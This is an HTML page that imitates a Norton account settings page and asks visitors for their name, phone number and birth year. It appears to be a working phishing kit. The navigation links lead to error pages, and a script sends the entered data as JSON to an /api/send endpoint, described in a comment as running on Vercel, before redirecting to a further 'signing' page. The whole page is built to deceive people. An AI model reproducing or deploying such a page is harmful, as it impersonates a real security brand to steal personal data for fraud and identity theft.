<!doctype html>
<html lang="EN" class="web">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Account Update - Official Site | Norton Account Sign In & Set Up</title>

  <!-- Keep your CSS files (ensure these paths exist on Vercel/public) -->
  <link rel="stylesheet" href="css/norton-sprites-style1.css">
  <link rel="stylesheet" href="css/norton-nsl-web.css">

  <script src="js/norton-jquery.js"></script>

  <style>
    /* small safety: ensure core containers are visible if external CSS hides them */
    .profile-font, .profile-content, form#loginform { display: block !important; visibility: visible !important; }
    /* keep fonts comment removed for brevity */
  </style>
</head>
<body class="theme_default account-profile">

  <div id="wrapper-top">
    <div id="header-content" class="navbar">
      <div class="container">
        <span id="unify-header" style="float: left;">
          <div class="sso_responsive_img header_branded_logo" id="header-logo" style="margin: -15px;">
            <img src="logon.jpg" style="width: 180px;margin: 10px;" alt="logo">
            <div class="sso_responsive_img_inner" aria-label="Norton by Symantec"></div>
          </div>

          <div class="nav-section">
            <ul class="np-nav">
              <li><a href="embedded.html">Products & Services</a></li>
              <li><a href="embedded.html">Resources</a></li>
              <li><a href="error.html">Support</a></li>
              <li><a href="error.html">My Norton</a></li>
            </ul>
          </div>
        </span>

        <span id="nav-header" tabindex="0">
          <ul id="flexi-width" class="active">
            <li><a href="sso/logout.html">Sign Out</a></li>
          </ul>
        </span>
      </div>

      <div class="jumbotron bg_branded_style bg_font hidden_in_mobile">
        <div class="header">Account Settings</div>
        <div id="background-mask"></div>
      </div>
    </div>

    <div class="container full-screen-container">
      <div class="row">
        <div id="open-column" class="col-xs-12">
          <div id="open-content">
            <div class="account-setting-header-ws">
              <div class="row section"><div class="col-sm-12"><h2>Account Settings</h2></div></div>
            </div>

            <div class="header-text" style="text-align: center;">
              <h2>Welcome back! Please fill in the details below to continue.</h2>
            </div>

            <hr class="profile-content-divider">

            <!-- FORM: method removed (we POST from JS to /api/send on Vercel). Keep required attributes. -->
            <form id="loginform" name="loginform">
              <!-- EMAIL DISPLAY -->
              <div class="row section profile-row">
                <div class="col-sm-4 col-xs-12 profile-title"><h4>Email</h4></div>
                <div class="col-sm-8 col-xs-12 profile-font profile-content">
                  <div class="profileData">
                    <div class="row col-sm-4">Email</div>
                    <div class="row col-sm-8">
                      <span id="emailAddress"></span>
                      <div class="loa-verified-check-image displayInline"></div>
                      <div class="profileData_loaLevel displayInline">Email verified</div>
                    </div>
                  </div>
                </div>
              </div>

              <hr class="profile-content-divider">

              <!-- NAME / PHONE / BIRTH YEAR -->
              <div class="row section middle profile-row">
                <div class="col-sm-4 col-xs-12 profile-title"><h4>Name and Phone</h4></div>
                <div class="col-sm-8 col-xs-12 profile-font profile-content">

                  <div class="profileData">
                    <div class="row col-sm-4">Name</div>
                    <div class="row col-sm-8">
                      <input type="text" name="name" id="name" class="form-control customInputBox" value="" required>
                    </div>
                  </div>

                  <hr class="profile-value-separator">

                  <div class="profileData">
                    <div class="row col-sm-4">Phone</div>
                    <div class="row col-sm-8">
                      <input type="text" name="phone" id="phone" class="form-control customInputBox" value="" required>
                    </div>
                  </div>

                  <hr class="profile-value-separator">

                  <div class="profileData">
                    <div class="row col-sm-4">Your Birth Year</div>
                    <div class="row col-sm-8">
                      <select name="birthYear" id="birthYear" class="form-control customInputBox" required>
                        <option value="">Your Birth Year *</option>
                        <!-- full list 1919..2005 -->
                        <option value="1919">1919</option><option value="1920">1920</option>
                        <option value="1921">1921</option><option value="1922">1922</option>
                        <option value="1923">1923</option><option value="1924">1924</option>
                        <option value="1925">1925</option><option value="1926">1926</option>
                        <option value="1927">1927</option><option value="1928">1928</option>
                        <option value="1929">1929</option><option value="1930">1930</option>
                        <option value="1931">1931</option><option value="1932">1932</option>
                        <option value="1933">1933</option><option value="1934">1934</option>
                        <option value="1935">1935</option><option value="1936">1936</option>
                        <option value="1937">1937</option><option value="1938">1938</option>
                        <option value="1939">1939</option><option value="1940">1940</option>
                        <option value="1941">1941</option><option value="1942">1942</option>
                        <option value="1943">1943</option><option value="1944">1944</option>
                        <option value="1945">1945</option><option value="1946">1946</option>
                        <option value="1947">1947</option><option value="1948">1948</option>
                        <option value="1949">1949</option><option value="1950">1950</option>
                        <option value="1951">1951</option><option value="1952">1952</option>
                        <option value="1953">1953</option><option value="1954">1954</option>
                        <option value="1955">1955</option><option value="1956">1956</option>
                        <option value="1957">1957</option><option value="1958">1958</option>
                        <option value="1959">1959</option><option value="1960">1960</option>
                        <option value="1961">1961</option><option value="1962">1962</option>
                        <option value="1963">1963</option><option value="1964">1964</option>
                        <option value="1965">1965</option><option value="1966">1966</option>
                        <option value="1967">1967</option><option value="1968">1968</option>
                        <option value="1969">1969</option><option value="1970">1970</option>
                        <option value="1971">1971</option><option value="1972">1972</option>
                        <option value="1973">1973</option><option value="1974">1974</option>
                        <option value="1975">1975</option><option value="1976">1976</option>
                        <option value="1977">1977</option><option value="1978">1978</option>
                        <option value="1979">1979</option><option value="1980">1980</option>
                        <option value="1981">1981</option><option value="1982">1982</option>
                        <option value="1983">1983</option><option value="1984">1984</option>
                        <option value="1985">1985</option><option value="1986">1986</option>
                        <option value="1987">1987</option><option value="1988">1988</option>
                        <option value="1989">1989</option><option value="1990">1990</option>
                        <option value="1991">1991</option><option value="1992">1992</option>
                        <option value="1993">1993</option><option value="1994">1994</option>
                        <option value="1995">1995</option><option value="1996">1996</option>
                        <option value="1997">1997</option><option value="1998">1998</option>
                        <option value="1999">1999</option><option value="2000">2000</option>
                        <option value="2001">2001</option><option value="2002">2002</option>
                        <option value="2003">2003</option><option value="2004">2004</option>
                        <option value="2005">2005</option>
                      </select>
                    </div>
                  </div>

                </div>
              </div>

              <div class="form-group text-center">
                <!-- button is submit so form submit handler triggers -->
                <input type="submit" class="btn btn-lg btn-block-sm signin_button" style="margin-top: 15px;" value="Continue">
              </div>
            </form>

          </div>
        </div>
      </div>
    </div>
  </div>

  <div id="wrapper-bottom">
    <footer class="np-global-footer" id="ngp-main-footer">
      <div class="row">
        <ul class="footer-links">
          <li><a href="javascript:void(0);">Terms of Service</a></li>
          <li><a href="javascript:void(0);" id="default_footer_privacy_link">Privacy Policy</a></li>
        </ul>
      </div>
    </footer>
  </div>

  <script>
    // simple client JS: will POST JSON to /api/send when deployed to Vercel
    document.getElementById('loginform').addEventListener('submit', async function (e) {
      e.preventDefault();
      const name = document.getElementById('name').value.trim();
      const phone = document.getElementById('phone').value.trim();
      const birthYear = document.getElementById('birthYear').value;

      if (!name || !phone) { alert('Please fill in Name and Phone'); return; }

      try {
        const res = await fetch('/api/send', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ name, phone, birthYear })
        });
        if (res.ok) {
          window.location.href = 'signing.html';
        } else {
          console.error('Server error', await res.text());
          alert('There was an error sending your data. Try again later.');
        }
      } catch (err) {
        console.error('Network', err);
        alert('Network error. Please check your connection.');
      }
    });
  </script>
</body>
</html>